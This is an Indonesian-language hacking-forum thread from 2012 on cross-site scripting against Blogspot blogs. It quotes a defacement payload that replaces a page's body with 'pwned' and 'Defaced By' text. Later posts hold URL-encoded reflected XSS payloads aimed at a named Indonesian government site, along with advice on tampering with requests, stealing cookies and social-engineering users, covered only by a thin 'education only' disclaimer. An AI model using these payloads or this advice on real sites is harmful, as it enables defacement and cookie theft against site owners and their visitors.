(share) vulnerability xss pada blogspot

**Al - Ayyubi** · 11-07-2012, 11:52 AM

berguru sama murid nya aja deh , thnk's om Ts ilmunya Smile

**czeroo_cool** · 11-08-2012, 06:45 AM

(10-06-2012, 06:25 PM)xsan-lahci Wrote: hmm berawal dari perbincangan ane dan guru xss ane om Cassaprodigy , perbincangan di irc channel #IBTeam dia ngasih tau ternyata pada blogspot bisa di inject html dengan catatan blogspot tersebut ketika dibuka mengeluarkan colom javascript alert dimana mengajak kita berkenalan seperti di bawah ini

Target : blogspot
Dork : Use Your Mind! or you can find many dork on my blog

Spoiler! :

oke jelas banget tuh ada script alertnya bro , tinggal kita isi deh tag HTML pastikan ente baca postingan om Cassaprodigy sebelumnya tentang XSS ya

disini ane isikan dengan Tag seperti berikut bro

PHP Code:
<script>document.body.innerHTML="<h1>pwned by xsan-lahci and Cassaprodigy </h1></strong> <strong><xsan-lahci> This Site Has been Defaced By : xsan-lahci and Cassaprodigy<br/>Greetz To : THJC | Junior | and you<br/>contact me [email protected]";</script

dan hasilnya Taraaaa

Spoiler! :

and this is my target please dont use for blackhat job

Thanks To Cassaprodigy and My target hahaha Sumber dikunjungi juga yah

Manteb lagi kalo make XSS Tunneling om.
Tinggal main soceng dikit ke Pengguna nya.. And Duar... Dapet tuh blogspot di Obok2..

**xsan-lahci** · 11-08-2012, 08:58 AM

jangan jail wakakak Smile

**dvil** · 11-09-2012, 09:12 PM

http://www.bapeten.go.id/?ha=1&ha=%22%20...=0&unit_id=

ini kok ndak bisa

http://bapeten.go.id/index.php?cari=%27%...80&phal3=9

(11-09-2012, 09:12 PM)dvil Wrote: /?ha=1&ha=%22%20onmouseover%3dprompt%28942885%29%20bad%3d%22&info_group_id=&modul=news&st=30&st=0&unit_id=

ini kok ndak bisa
/index.php?cari=%27%22%28%29%26%251%3CScRiPt%20%3Eprompt%28970260%29%3C%2fScRiPt%3E&menu=cari_inf&modul=news&mulai_dir=80&phal3=9
http://bapeten.go.id/index.php?cari=%27%...80&phal3=9

http://bapeten.go.id/index.php?cari=%27%...80&phal3=9

**xsan-lahci** · 11-13-2012, 04:05 PM

bisa kok itu vulner xss ...coba pakai tamper data om

**dvil** · 11-14-2012, 07:47 AM

xss itu bahaya gak sih mas

dan apa yang diuntungkan ketuka melakukan xss attack bagi attacker

**xsan-lahci** · 11-14-2012, 03:02 PM

lumayan bahaya om.. tergantung attackernya .. keuntungannya bagi attacker bisa stealth cookie kl ada victim yang asal klik aja pas dia liat xss

**czeroo_cool** · 11-18-2012, 11:48 PM

(11-08-2012, 08:58 AM)xsan-lahci Wrote: jangan jail wakakak

Sejauh ini belum Big Grin

, Just for education Purpose Only Om :-bd

**cassaprodigy** · 11-26-2012, 03:17 PM

(11-14-2012, 07:47 AM)dvil Wrote: xss itu bahaya gak sih mas

dan apa yang diuntungkan ketuka melakukan xss attack bagi attacker

dbilang bahaya jga nda.. tpi klo niat bnget bisa jadi serangan ampuh om.. Big Grin

(11-14-2012, 03:02 PM)xsan-lahci Wrote: lumayan bahaya om.. tergantung attackernya .. keuntungannya bagi attacker bisa stealth cookie kl ada victim yang asal klik aja pas dia liat xss

sbner na bukan cuma stealth cookie aj om.. masih ada keuntungan yg lebih berbahaya bagi sang attacker tinggal bagaimana script dy pake dan tuk apa script tu..
dah ach nda usah dperpanjang gy bisa bahaya soal na masih ada jurus yg laen gy.. hheeheehe..

**ardian** · 11-28-2012, 11:32 PM

ada yang tau ga om,, attack nya lok ada kelemahan di banner disclosure